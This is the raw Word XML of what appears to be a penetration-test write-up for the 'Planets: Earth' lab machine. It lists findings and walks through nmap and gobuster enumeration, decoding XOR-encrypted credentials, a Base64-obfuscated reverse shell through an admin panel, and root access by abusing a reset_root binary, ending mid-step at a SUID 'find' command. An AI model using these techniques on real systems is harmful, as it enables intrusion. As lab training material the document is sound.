          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005C">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="ee0000"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">High</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tl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Exposure of Sensitive Data in Frontend Metadata</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="397" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000060">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="ee0000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="ee0000"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000061">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Local Privilege Escalation ( LPE ) via Insecure SUID Binary</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="397" w:hRule="atLeast"/>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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000063">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="e97132"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Medium</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tl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Broken Access Control via Forced Browsing and File Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="397" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000065">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000066">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="e97132"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="c00000"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000067">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Code Injection leading to RCE ( Remote Code Execution )</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repb2cslr7by" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Compromised System Walkthrough</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">During my testing of the assessment I was able to retrieve credentials for user via </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="4f81bd"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">testingnotes.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and decode password value from frontend metadata on main page. With credentials acquired I gained access to command shell and perform reverse shell payload execution, which furthermore led me to privilege escalation by abusing reset_root executive file. Steps below demonstrate processes of information gathering / enumeration, exploitation, privilege escalation and post-exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.nakq7c13ah51" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Detailed Walkthrough</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.jhrruodzx2mb" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Enumeration / information gathering</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 used </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="4f81bd"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -pn -n 192.168.239.0/24</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to check for IP addresses on my local interface and found </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="4f81bd"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.239.7</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> which confirmed to be earth’s IP address.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Using the ping</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> command I checked if 192.168.239.7 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">responded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 used </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="4f81bd"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -sV -sC -n 192.168.239.7</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for standard port scanning without reverse DNS and with basic scripts. This way I found that The Planets: Earth runs OpenSSH on port 22 and Apache </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">servers</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> on ports 443 and 80 ( http and https ) with earth.local and terratest.earth.local instances.</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 added new found paths to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="4f81bd"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/hosts</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> path.</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 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">used the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="4f81bd"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gobuster</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> tool to enumerate through directories and found /admin subpage on earth.local with login form and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">multiple</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> subpages including </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="4f81bd"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">robots.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> on </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="4f81bd"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">terratest.earth.local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3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.yht9jx79p1ji" w:id="11"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploitation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Inside the robots.txt file I found that there is an interesting file named </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="4f81bd"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">testingnotes.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Inside were sensitive information about user name ( terra ), type of encryption used ( XOR ) and encryption key that was in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="4f81bd"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">testdata.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>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Using that information I decoded the encrypted string found on frontend metadata of earth.local main page with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="4f81bd"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cyberchef</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and received a password.</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Using credentials I logged in to the admin panel and tried to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">perform a reverse</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> shell. Simplest methods failed, therefore I </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">obfuscated</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> the payload with Base64 encoding and used it instead, which </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">fortunately</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> worked.</w:t>
      </w:r>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Using an unrestricted</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> shell interface I was able to find and read flag </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="4f81bd"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">user_flag.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000078">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.dzayt6kx5e5" w:id="12"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Post-Exploitation</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With reverse shell active I </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">found the user</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag inside of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="4f81bd"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/earth_web/user_flag.txt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 wasn’t sure how to escalate to admin, however I found information that </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">on a user</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> session there </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is an executable</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> script named </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="4f81bd"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">reset_root</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. I tried to run the script and later on discovered with ltrace </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">on the kali</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> machine that it lacked 3 specific files to run.</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 created new files on user console and ran the script again – this time </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">resetting</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> the password to default ( Earth )</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 used </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="4f81bd"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">su root</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">retrieved</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> the root flag inside of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="4f81bd"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/root/root_flag.txt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D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.twk32aa38fsl" w:id="13"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reproduction of the steps</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using nmap and gobuster I found information about the target and its active pages / services.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5753100" cy="5969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531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0" distT="0" distL="0" distR="0">
            <wp:extent cx="5746750" cy="245745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4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0" distT="0" distL="0" distR="0">
            <wp:extent cx="5746750" cy="2508250"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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46750" cy="25082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0" distT="0" distL="0" distR="0">
            <wp:extent cx="5746750" cy="22606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467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Inside of robots.txt I found testingnotes.txt file and sensitive information within it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000084">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5740400" cy="254635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4040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0" distT="0" distL="0" distR="0">
            <wp:extent cx="5740400" cy="253365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04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Using information from testingnotes.txt and testdata.txt I gained access to username and password for the admin panel.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000087">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5759450" cy="2724150"/>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594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With credentials ready I went to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="4f81bd"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">earth.local/admin</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> login page and opened the admin panel and received the user flag. With encoded reverse shell payload I also gained remote access to the console.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000089">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5740400" cy="150495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40400" cy="1504950"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5740400" cy="165735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404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0" distT="0" distL="0" distR="0">
            <wp:extent cx="5746750" cy="179705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46750" cy="17970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0" distT="0" distL="0" distR="0">
            <wp:extent cx="5759450" cy="22479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594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Using a command </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="4f81bd"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">find / -perm -u=s 2&gt;/dev/null</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
